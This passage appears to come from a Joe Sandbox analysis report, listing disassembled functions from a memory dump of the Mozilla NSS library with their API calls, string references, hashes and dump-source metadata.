PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CA94F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA94FC8

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: 672dd45d1fef2b61e1a196bb951efb6635e24d98330b8ec2a1721594b8c36274
Instruction ID: 4eba90ea081f0715c63dc209a34fe155fa111bc6a242e9703c2e461e30854980
Opcode Fuzzy Hash: 672dd45d1fef2b61e1a196bb951efb6635e24d98330b8ec2a1721594b8c36274
Instruction Fuzzy Hash: CB81B3759183019FE701CF24D941B9BB7E4AB88748F18852DF969CB741EB30E988CB92

Function 6CAC8F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6CAC9582), ref: 6CAC8F5B

Part of subcall function 6CADBE30: SECOID_FindOID_Util.NSS3(6CA9311B,00000000,?,6CA9311B,?), ref: 6CADBE44

PORT_NewArena_Util.NSS3(00000800), ref: 6CAC8F6A

Part of subcall function 6CAE0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA887ED,00000800,6CA7EF74,00000000), ref: 6CAE1000
Part of subcall function 6CAE0FF0: PR_NewLock.NSS3(?,00000800,6CA7EF74,00000000), ref: 6CAE1016
Part of subcall function 6CAE0FF0: PL_InitArenaPool.NSS3(00000000,security,6CA887ED,00000008,?,00000800,6CA7EF74,00000000), ref: 6CAE102B

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CAC8FC3
PK11_GetIVLength.NSS3(-00000001), ref: 6CAC8FE0
SEC_ASN1DecodeItem_Util.NSS3(?,?,6CBAD820,6CAC9576), ref: 6CAC8FF9
DER_GetInteger_Util.NSS3(?), ref: 6CAC901D
PORT_ZAlloc_Util.NSS3(?), ref: 6CAC903E
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAC9062
memcpy.VCRUNTIME140(00000024,?,?), ref: 6CAC90A2
PORT_ZAlloc_Util.NSS3(?), ref: 6CAC90CA
memcpy.VCRUNTIME140(00000018,?,?), ref: 6CAC90F0
PR_SetError.NSS3(FFFFE006,00000000), ref: 6CAC912D
free.MOZGLUE(00000000), ref: 6CAC9136
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CAC9145

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
String ID:
API String ID: 3626836424-0
Opcode ID: 2efbd6f50964f53e5d683224f90a18ed49ba495ce48375b893d280a298a13bfd
Instruction ID: 48fbd938c3434e1b219643f1009ef68d4c869670768c4e2c6a5062adaac2a4cd
Opcode Fuzzy Hash: 2efbd6f50964f53e5d683224f90a18ed49ba495ce48375b893d280a298a13bfd
Instruction Fuzzy Hash: CD51B1B1A042409BE700CF28DD81B9BB7E8EF94318F094529ED5997741EB35E989CBD3

Function 6CB94960 Relevance: 21.1, APIs: 14, Instructions: 121COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(00000004,?,6CB98061,?,?,?,?), ref: 6CB9497D
OpenSemaphoreA.KERNEL32(00100002,00000000,?), ref: 6CB9499E
GetLastError.KERNEL32(?,?,6CB98061,?,?,?,?), ref: 6CB949AC
PR_SetError.NSS3(FFFFE8C2,0000007B,?,?,6CB98061,?,?,?,?), ref: 6CB949C2

Part of subcall function 6CB2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB2C2BF

PR_SetError.NSS3(FFFFE890,00000000,?,?,6CB98061,?,?,?,?), ref: 6CB949D6
CreateSemaphoreA.KERNEL32(00000000,6CB98061,7FFFFFFF,?), ref: 6CB94A19
GetLastError.KERNEL32(?,?,?,?,6CB98061,?,?,?,?), ref: 6CB94A30
PR_SetError.NSS3(FFFFE8C9,000000B7,?,?,?,?,6CB98061,?,?,?,?), ref: 6CB94A49
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,6CB98061,?,?,?,?), ref: 6CB94A52
GetLastError.KERNEL32(?,?,?,?,6CB98061,?,?,?,?), ref: 6CB94A5A
free.MOZGLUE(00000000,?,?,?,?,?,6CB98061,?,?,?,?), ref: 6CB94A6A
CreateSemaphoreA.KERNEL32(?,6CB98061,7FFFFFFF,?), ref: 6CB94A9A
free.MOZGLUE(?,?,?,?,?,6CB98061,?,?,?,?), ref: 6CB94AAE
free.MOZGLUE(?,?,?,?,?,6CB98061,?,?,?,?), ref: 6CB94AC2

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Error$LastSemaphorefree$Create$CloseHandleOpenValuemalloc
String ID:
API String ID: 2092618053-0
Opcode ID: f40c0abce02ee81e6f74369e4b52a907caaac1969d971c2fed07c9ff4b107296
Instruction ID: fdba77336f652d0b86455d1271cf029869d7162da40d53cc08e0dfbe5c185c3b
Opcode Fuzzy Hash: f40c0abce02ee81e6f74369e4b52a907caaac1969d971c2fed07c9ff4b107296
Instruction Fuzzy Hash: 9E41B074B002459FDB00AFA8DC49B9E77B8EF4A359F540134F929A7740EB31E9048BA6

Function 6CB9C8A0 Relevance: 21.1, APIs: 14, Instructions: 94stringCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000020), ref: 6CB9C8B9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB9C8DA
malloc.MOZGLUE(00000001), ref: 6CB9C8E4
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CB9C8F8
PR_NewLock.NSS3 ref: 6CB9C909
PR_NewCondVar.NSS3(00000000), ref: 6CB9C918
PR_NewCondVar.NSS3(00000000), ref: 6CB9C92A

Part of subcall function 6CA70F00: PR_GetPageSize.NSS3(6CA70936,FFFFE8AE,?,6CA016B7,00000000,?,6CA70936,00000000,?,6CA0204A), ref: 6CA70F1B
Part of subcall function 6CA70F00: PR_NewLogModule.NSS3(clock,6CA70936,FFFFE8AE,?,6CA016B7,00000000,?,6CA70936,00000000,?,6CA0204A), ref: 6CA70F25

free.MOZGLUE(00000000), ref: 6CB9C947

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Cond$LockModulePageSizecallocfreemallocstrcpystrlen
String ID:
API String ID: 2931242645-0
Opcode ID: bb3cdc3e0c2baab8c0230fd9b5207ef38ea9f970c5fb9f7b71570bc9409c51f2
Instruction ID: a17c66b44684ab2a2b66271b9cd94e983eccae4e12a071c0890e6515e273c957
Opcode Fuzzy Hash: bb3cdc3e0c2baab8c0230fd9b5207ef38ea9f970c5fb9f7b71570bc9409c51f2
Instruction Fuzzy Hash: 082104B1A007429BEB11BF799C0565B37B8EF06298F040538E85AC3B01EB31E518CBA3

Function 6CA7AF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6CA7AF47

Part of subcall function 6CB49090: TlsGetValue.KERNEL32 ref: 6CB490AB
Part of subcall function 6CB49090: TlsGetValue.KERNEL32 ref: 6CB490C9
Part of subcall function 6CB49090: EnterCriticalSection.KERNEL32 ref: 6CB490E5
Part of subcall function 6CB49090: TlsGetValue.KERNEL32 ref: 6CB49116
Part of subcall function 6CB49090: LeaveCriticalSection.KERNEL32 ref: 6CB4913F

FreeLibrary.KERNEL32(?), ref: 6CA7AF6D
free.MOZGLUE(?), ref: 6CA7AFA4
free.MOZGLUE(?), ref: 6CA7AFAA
PR_ExitMonitor.NSS3 ref: 6CA7AFB5
PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6CA7AFF5
PR_ExitMonitor.NSS3 ref: 6CA7B005
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CA7B014
PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6CA7B028
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CA7B03C

Strings

%s decr => %d, xrefs: 6CA7AFF0
Unloaded library %s, xrefs: 6CA7B023

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
String ID: %s decr => %d$Unloaded library %s
API String ID: 4015679603-2877805755
Opcode ID: 93d1d492a4495ee905cf36b0deb431c7d5dbdeb0a5e3cb969de5c0084b04c3d3
Instruction ID: 2a4c447e067a422066a2507f3fa6914a3466bdd6867a8ad660a9659797181de1
Opcode Fuzzy Hash: 93d1d492a4495ee905cf36b0deb431c7d5dbdeb0a5e3cb969de5c0084b04c3d3
Instruction Fuzzy Hash: 813127BDB04111BFDB219F64DC40A59B776FB09748B284125E80997A41E732EC54C7F2

Function 6CAC6C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CAC781D,00000000,6CABBE2C,?,6CAC6B1D,?,?,?,?,00000000,00000000,6CAC781D), ref: 6CAC6C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CAC781D,?,6CABBE2C,?), ref: 6CAC6C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CAC781D), ref: 6CAC6C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CAC6C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CAC6C96

Part of subcall function 6CA71240: TlsGetValue.KERNEL32(00000040,?,6CA7116C,NSPR_LOG_MODULES), ref: 6CA71267
Part of subcall function 6CA71240: EnterCriticalSection.KERNEL32(?,?,?,6CA7116C,NSPR_LOG_MODULES), ref: 6CA7127C
Part of subcall function 6CA71240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CA7116C,NSPR_LOG_MODULES), ref: 6CA71291
Part of subcall function 6CA71240: PR_Unlock.NSS3(?,?,?,?,6CA7116C,NSPR_LOG_MODULES), ref: 6CA712A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CAC6CAA

Strings

sql:, xrefs: 6CAC6C52
NSS_DEFAULT_DB_TYPE, xrefs: 6CAC6C91
dbm, xrefs: 6CAC6CA4
dbm:, xrefs: 6CAC6C3A
rdb:, xrefs: 6CAC6C69
extern:, xrefs: 6CAC6C7E

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: 97d13a8bf4a0fb724196e615c966a02745398553792faf9550cebdaf20166ca9
Instruction ID: f859a45222ac0a6df9278980c3f290226521fcc028196e84d4c9620950527f2b
Opcode Fuzzy Hash: 97d13a8bf4a0fb724196e615c966a02745398553792faf9550cebdaf20166ca9
Instruction Fuzzy Hash: EF01F2F570638223EA00277A1D5AF36238D9F81268F180432FE18F1A81EBA2F52440B7

Function 6CAD4E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6CA978F8), ref: 6CAD4E6D

Part of subcall function 6CA709E0: TlsGetValue.KERNEL32(00000000,?,?,?,6CA706A2,00000000,?), ref: 6CA709F8
Part of subcall function 6CA709E0: malloc.MOZGLUE(0000001F), ref: 6CA70A18
Part of subcall function 6CA709E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6CA70A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6CA978F8), ref: 6CAD4ED9

Part of subcall function 6CAC5920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6CAC7703,?,00000000,00000000), ref: 6CAC5942
Part of subcall function 6CAC5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6CAC7703), ref: 6CAC5954
Part of subcall function 6CAC5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CAC596A
Part of subcall function 6CAC5920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CAC5984
Part of subcall function 6CAC5920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6CAC5999
Part of subcall function 6CAC5920: free.MOZGLUE(00000000), ref: 6CAC59BA
Part of subcall function 6CAC5920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6CAC59D3
Part of subcall function 6CAC5920: free.MOZGLUE(00000000), ref: 6CAC59F5
Part of subcall function 6CAC5920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6CAC5A0A
Part of subcall function 6CAC5920: free.MOZGLUE(00000000), ref: 6CAC5A2E
Part of subcall function 6CAC5920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6CAC5A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6CA978F8), ref: 6CAD4EB3

Part of subcall function 6CAD4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CAD4EB8,?,?,?,?,?,?,?,?,?,?,6CA978F8), ref: 6CAD484C
Part of subcall function 6CAD4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CAD4EB8,?,?,?,?,?,?,?,?,?,?,6CA978F8), ref: 6CAD486D
Part of subcall function 6CAD4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6CAD4EB8,?), ref: 6CAD4884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CA978F8), ref: 6CAD4EC0

Part of subcall function 6CAD4470: TlsGetValue.KERNEL32(00000000,?,6CA97296,00000000), ref: 6CAD4487
Part of subcall function 6CAD4470: EnterCriticalSection.KERNEL32(?,?,?,6CA97296,00000000), ref: 6CAD44A0
Part of subcall function 6CAD4470: PR_Unlock.NSS3(?,?,?,?,6CA97296,00000000), ref: 6CAD44BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6CA978F8), ref: 6CAD4F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CA978F8), ref: 6CAD4F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CA978F8), ref: 6CAD4F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CA978F8), ref: 6CAD4F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6CA978F8), ref: 6CAD4F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CA978F8), ref: 6CAD4F8F
PK11_UpdateSlotAttribute.NSS3(?,6CBADCB0,00000000), ref: 6CAD4FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6CAD501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6CA978F8), ref: 6CAD506B

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: db5719e1968e0422866490d03f6356d2604936dc56a960d31789787a70c721cd
Instruction ID: 1b7060883520abae5edd9c3a37e1c76190b1d94ed179410549edc7c21e674f8b
Opcode Fuzzy Hash: db5719e1968e0422866490d03f6356d2604936dc56a960d31789787a70c721cd
Instruction Fuzzy Hash: 9D5105F59006069FEB119F24ED016AA37B4FF0935DF1A0634E81A83A11FB31F598CAD2

Function 6CB9ABB0 Relevance: 19.7, APIs: 13, Instructions: 173COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6CB9ABD5
_PR_MD_UNLOCK.NSS3(?), ref: 6CB9AC21

Part of subcall function 6CB470F0: LeaveCriticalSection.KERNEL32(6CB90C7B), ref: 6CB4710D

EnterCriticalSection.KERNEL32(?), ref: 6CB9AC44
_PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6CB9AC6E
_PR_MD_UNLOCK.NSS3(?), ref: 6CB9AC97
EnterCriticalSection.KERNEL32(?), ref: 6CB9ACBF
PR_NewCondVar.NSS3(?), ref: 6CB9ACDB
_PR_MD_UNLOCK.NSS3(?), ref: 6CB9AD0D
PR_SetPollableEvent.NSS3(?), ref: 6CB9AD18
EnterCriticalSection.KERNEL32(?), ref: 6CB9AD31

Part of subcall function 6CB49890: TlsGetValue.KERNEL32(?,?,?,6CB497EB), ref: 6CB4989E

_PR_MD_UNLOCK.NSS3(?), ref: 6CB9AD89
PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6CB9AD98
_PR_MD_UNLOCK.NSS3(?), ref: 6CB9ADC5

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CriticalSection$Enter$CondErrorEventLeavePollableValue
String ID:
API String ID: 829741924-0
Opcode ID: b9b953f7ac4cbb3f6cdafebaa05ec7e4fa5c6ba15d686c3e414b7ecb3fc9451e
Instruction ID: f6ce7f3d22ed1aea31e9ee3e30b4fc2da24cc41c0c2c34ec28b0953b86e48f9f
Opcode Fuzzy Hash: b9b953f7ac4cbb3f6cdafebaa05ec7e4fa5c6ba15d686c3e414b7ecb3fc9451e
Instruction Fuzzy Hash: 1B619FB2C046509BC7109F25C88474AB7F8EF4571AF268A39D8595BB26E771F888CFC1

Function 6CA7ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA7ACE2
malloc.MOZGLUE(00000001), ref: 6CA7ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CA7AD02
TlsGetValue.KERNEL32 ref: 6CA7AD3C
calloc.MOZGLUE(00000001,?), ref: 6CA7AD8C
PR_Unlock.NSS3 ref: 6CA7ADC0
free.MOZGLUE(00000000), ref: 6CA7AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6CA7AE58
free.MOZGLUE(00000000), ref: 6CA7AE69
free.MOZGLUE(?), ref: 6CA7AE78
PR_Unlock.NSS3 ref: 6CA7AE8C
free.MOZGLUE(?), ref: 6CA7AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA7AEC7

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: f9b29b9c2bc709d66431c26a39ed528896e9614170db806b2add9fc73a5c2afa
Instruction ID: d3962751dc3202d4b01e30edda81441d0da4beb4686b8a5addf6fb67abfa8b8d
Opcode Fuzzy Hash: f9b29b9c2bc709d66431c26a39ed528896e9614170db806b2add9fc73a5c2afa
Instruction Fuzzy Hash: B051B1B9A00125AFDF10DF68D9417AE7775BF0A789F180125D808A3B02D731ED94CBE2

Function 6CABADC0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6CABADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CABAE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CABAE29

Part of subcall function 6CB9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CABAE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CABAE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CABAE8A
PR_LogPrint.NSS3(?,00000000), ref: 6CABAEA0

Strings

hKey = 0x%x, xrefs: 6CABAE62, 6CABAE72
(CK_INVALID_HANDLE), xrefs: 6CABAE1F, 6CABAE80
C_MessageSignInit, xrefs: 6CABADE1
hSession = 0x%x, xrefs: 6CABAE01, 6CABAE11

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
API String ID: 332880674-605059067
Opcode ID: 29573c55f91063546328dbe60f4ddc62b705a811cf2731e9c62973188c620229
Instruction ID: 1bf42a655bec39badb7e686d4231892a86035f96e6fa8547d5c5308ca77b57ad
Opcode Fuzzy Hash: 29573c55f91063546328dbe60f4ddc62b705a811cf2731e9c62973188c620229
Instruction Fuzzy Hash: 1D31FA35600194AFCB01DF64ED48BAE777AAB4A759F484438F5097B711DB309D48CBA2

Function 6CAB4B80 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 107COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DestroyObject), ref: 6CAB4BA6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAB4BD7
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAB4BE9

Part of subcall function 6CB9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAB4BFF
